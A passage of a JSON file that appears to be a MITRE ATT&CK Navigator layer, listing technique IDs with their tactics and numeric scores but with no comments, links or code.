"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1021.007",
"tactic": "lateral-movement",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1562.008",
"tactic": "defense-evasion",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1608.003",
"tactic": "resource-development",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1525",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1566",
"tactic": "initial-access",
"score": 14,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1566.002",
"tactic": "initial-access",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1580",
"tactic": "discovery",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1619",
"tactic": "discovery",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1005",
"tactic": "collection",
"score": 12,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1490",
"tactic": "impact",
"score": 26,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1136",
"tactic": "persistence",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.002",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.002",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.002",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.002",
"tactic": "initial-access",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1555",
"tactic": "credential-access",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1105",
"tactic": "command-and-control",
"score": 81,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1027",
"tactic": "defense-evasion",
"score": 94,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1567",
"tactic": "exfiltration",
"score": 12,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1568.002",
"tactic": "command-and-control",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1572",
"tactic": "command-and-control",
"score": 24,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1102",
"tactic": "command-and-control",
"score": 13,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1571",
"tactic": "command-and-control",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1082",
"tactic": "discovery",
"score": 33,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1056.001",
"tactic": "collection",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1056.001",
"tactic": "credential-access",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1123",
"tactic": "collection",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1055.009",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1055.009",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1201",
"tactic": "discovery",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1069.001",
"tactic": "discovery",
"score": 16,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1007",
"tactic": "discovery",
"score": 11,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1222.002",
"tactic": "defense-evasion",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1059.012",
"tactic": "execution",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1529",
"tactic": "impact",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1083",
"tactic": "discovery",
"score": 24,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1048.003",
"tactic": "exfiltration",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1133",
"tactic": "persistence",
"score": 19,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1133",
"tactic": "initial-access",
"score": 19,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1553.004",
"tactic": "defense-evasion",
"score": 10,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1033",
"tactic": "discovery",
"score": 30,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1593.003",
"tactic": "reconnaissance",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1115",
"tactic": "collection",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1564",
"tactic": "defense-evasion",
"score": 10,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1070.002",
"tactic": "defense-evasion",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1087.001",
"tactic": "discovery",
"score": 13,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1018",
"tactic": "discovery",
"score": 16,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1203",
"tactic": "execution",
"score": 31,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1068",
"tactic": "privilege-escalation",
"score": 29,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1592.004",
"tactic": "reconnaissance",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1562.012",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1070.006",
"tactic": "defense-evasion",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1554",
"tactic": "persistence",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1046",
"tactic": "discovery",
"score": 15,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1587",
"tactic": "resource-development",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1070.004",
"tactic": "defense-evasion",
"score": 15,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1653",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1036",
"tactic": "defense-evasion",
"score": 40,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1016",
"tactic": "discovery",
"score": 12,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1505.003",
"tactic": "persistence",
"score": 34,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1219.002",
"tactic": "command-and-control",
"score": 44,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1049",
"tactic": "discovery",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1562.003",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1014",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1518.001",
"tactic": "discovery",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1548.001",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1548.001",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1071.001",
"tactic": "command-and-control",
"score": 40,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1053.002",
"tactic": "execution",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1053.002",
"tactic": "persistence",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1053.002",
"tactic": "privilege-escalation",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.006",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.006",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.006",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1136.001",
"tactic": "persistence",
"score": 16,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1204.001",
"tactic": "execution",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1070.003",
"tactic": "defense-evasion",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1543.003",
"tactic": "persistence",
"score": 47,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1543.003",
"tactic": "privilege-escalation",
"score": 47,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1584",
"tactic": "resource-development",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.006",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.006",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1030",
"tactic": "exfiltration",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1057",
"tactic": "discovery",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1562.006",
"tactic": "defense-evasion",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1499",
"tactic": "impact",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.001",
"tactic": "persistence",
"score": 91,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.001",
"tactic": "privilege-escalation",
"score": 91,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.001",
"tactic": "defense-evasion",
"score": 91,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1106",
"tactic": "execution",
"score": 14,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1543.002",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1543.002",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.004",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.004",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1036.003",
"tactic": "defense-evasion",
"score": 27,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1027.003",
"tactic": "defense-evasion",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1552.003",
"tactic": "credential-access",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1564.001",
"tactic": "defense-evasion",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1040",
"tactic": "credential-access",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1040",
"tactic": "discovery",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1113",
"tactic": "collection",
"score": 10,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1027.001",
"tactic": "defense-evasion",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1560.001",
"tactic": "collection",
"score": 16,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1212",
"tactic": "credential-access",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1588.001",
"tactic": "resource-development",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1204",
"tactic": "execution",
"score": 10,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1558",
"tactic": "credential-access",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1003.001",
"tactic": "credential-access",
"score": 78,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1003.002",
"tactic": "credential-access",
"score": 26,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1588",
"tactic": "resource-development",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1505.001",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1021.003",
"tactic": "lateral-movement",
"score": 13,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1047",
"tactic": "execution",
"score": 50,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1087",
"tactic": "discovery",
"score": 16,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1053",
"tactic": "execution",
"score": 12,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1053",
"tactic": "persistence",
"score": 12,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1053",
"tactic": "privilege-escalation",
"score": 12,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1569.002",
"tactic": "execution",
"score": 43,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1112",
"tactic": "defense-evasion",
"score": 95,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1112",
"tactic": "persistence",
"score": 95,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1213",
"tactic": "collection",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1021",
"tactic": "lateral-movement",
"score": 10,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1498",
"tactic": "impact",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1041",
"tactic": "exfiltration",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1213.003",
"tactic": "collection",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1195.001",
"tactic": "initial-access",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1567.001",
"tactic": "exfiltration",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1609",
"tactic": "execution",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1611",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1036.005",
"tactic": "defense-evasion",
"score": 18,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1069.003",
"tactic": "discovery",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1021.004",
"tactic": "lateral-movement",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1586",
"tactic": "resource-development",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1591.004",
"tactic": "reconnaissance",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1003.004",
"tactic": "credential-access",
"score": 11,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1003.003",
"tactic": "credential-access",
"score": 23,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1048",
"tactic": "exfiltration",
"score": 11,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1021.002",
"tactic": "lateral-movement",
"score": 37,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1557.001",
"tactic": "credential-access",
"score": 10,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1557.001",
"tactic": "collection",
"score": 10,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1187",
"tactic": "credential-access",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1021.001",
"tactic": "lateral-movement",
"score": 15,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1095",
"tactic": "command-and-control",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.004",
"tactic": "persistence",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.004",
"tactic": "privilege-escalation",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1558.003",
"tactic": "credential-access",
"score": 17,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1595.002",
"tactic": "reconnaissance",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1071.004",
"tactic": "command-and-control",
"score": 17,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1102.002",
"tactic": "command-and-control",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1495",
"tactic": "impact",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1505",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1565.002",
"tactic": "impact",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1552.004",
"tactic": "credential-access",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1561.001",
"tactic": "impact",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1561.002",
"tactic": "impact",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1124",
"tactic": "discovery",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1557",
"tactic": "credential-access",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1557",
"tactic": "collection",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1037.005",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1037.005",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.014",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.014",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.003",
"tactic": "defense-evasion",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.003",
"tactic": "persistence",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.003",
"tactic": "privilege-escalation",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.003",
"tactic": "initial-access",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1569.001",
"tactic": "execution",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1543.001",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1543.001",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1543.004",
"tactic": "persistence",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1543.004",
"tactic": "privilege-escalation",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1218",
"tactic": "defense-evasion",
"score": 152,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1564.004",
"tactic": "defense-evasion",
"score": 23,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1189",
"tactic": "initial-access",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1564.002",
"tactic": "defense-evasion",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1555.001",
"tactic": "credential-access",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1497.001",
"tactic": "defense-evasion",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1497.001",
"tactic": "discovery",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1566.001",
"tactic": "initial-access",
"score": 23,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1059.002",
